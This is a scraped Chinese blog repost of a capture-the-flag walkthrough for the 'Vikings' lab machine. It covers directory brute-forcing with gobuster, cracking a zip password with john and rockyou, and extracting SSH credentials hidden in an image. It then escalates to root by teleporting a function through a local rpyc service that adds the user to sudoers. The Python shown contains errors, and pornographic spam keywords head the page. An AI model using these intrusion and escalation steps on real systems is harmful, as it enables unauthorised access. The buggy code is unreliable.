日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Vikings靶机打靶过程及思路

發(fā)布時間:2024/1/18 编程问答 42 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Vikings靶机打靶过程及思路 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

1.常規(guī)端口服務(wù)偵探

2.用gubuster進(jìn)行路徑爆破,發(fā)現(xiàn)war下war-is-over新目錄
gobuster dir -r -u http://10.0.2.16/ -x txt,html,php -w /usr/share/seclists/Discovery/Web-Content/common.txt

3.發(fā)現(xiàn)base64編碼字符串,在cyberchef里面解碼發(fā)現(xiàn)混亂無序
使用entro進(jìn)行熵增探測發(fā)現(xiàn)熵值為7.9超過7.5證明是經(jīng)過加密或壓縮后的文件
偵探發(fā)現(xiàn)是一個zip壓縮文件,下載保存后進(jìn)行解壓發(fā)現(xiàn)需要密碼

4.使用john進(jìn)行密碼爆破
首先將文件保存成hash值zip2john a.zip >hash
將wordlists里的Rockyou字典解壓保存到桌面
john hash --wordlists=rockyou.txt得到密碼ragnarok123

5.發(fā)現(xiàn)解壓后有圖片文件,思考是否有隱寫數(shù),使用工具進(jìn)行探測隱寫
使用steghide工具進(jìn)行探測 steghide info king但是發(fā)現(xiàn)又需要密碼
使用binwalk進(jìn)行二進(jìn)制的分析,binwalk -B king發(fā)現(xiàn)存在壓縮文件
查看后得到ssh賬號密碼嘗試登錄成功

6.查看readme文件里提示需要造船
boat文件里面給出提示是考拉茲猜想,進(jìn)行質(zhì)數(shù)查找,編寫簡單的素數(shù)判斷程序
對第29個質(zhì)數(shù)進(jìn)行考拉茲計算后打印ASCII編碼對應(yīng)的字符串
n=0
for x in range (1000)
if x<2:
continute
h=int(x/2)+1
for i in range(2,h):
if x%i=0:
break
else:
n+=1
print(n,“:”,x)
進(jìn)行考拉茲判斷
i=109
c=[i]
while i≠1:
if i%2=1:
i=i%3+1
else:
i=i//2
if i<256:
c.append(i)
print?
mR)|>^/Gky[gz=.F#j5P(
7.將數(shù)字進(jìn)行ASCII編碼還原,將得到的字符串進(jìn)行ssh登錄,發(fā)現(xiàn)進(jìn)入后進(jìn)行自動sudo
先bin/bash -i 進(jìn)行提權(quán),查看運行腳本的文件,里面運用了rpyc遠(yuǎn)程管理
import rpyc
def shell():
import os
os.system(“sudo usermod -a -G sudo ragnar”)
conn = rpyc.classic.connect(“l(fā)ocalhost”)
fn=conn.teleport(shell)
fn()

8.目標(biāo)靶機上查看18812端口是否開啟
ss -pantu | grep 18812發(fā)現(xiàn)開啟,并且是本機127.0.0.1,所以代碼需要在靶機上運行
運行腳本,升級shell ,/bin/bash

9.sudo -s成功提權(quán)到root權(quán)限,打靶完成

總結(jié)

以上是生活随笔為你收集整理的Vikings靶机打靶过程及思路的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。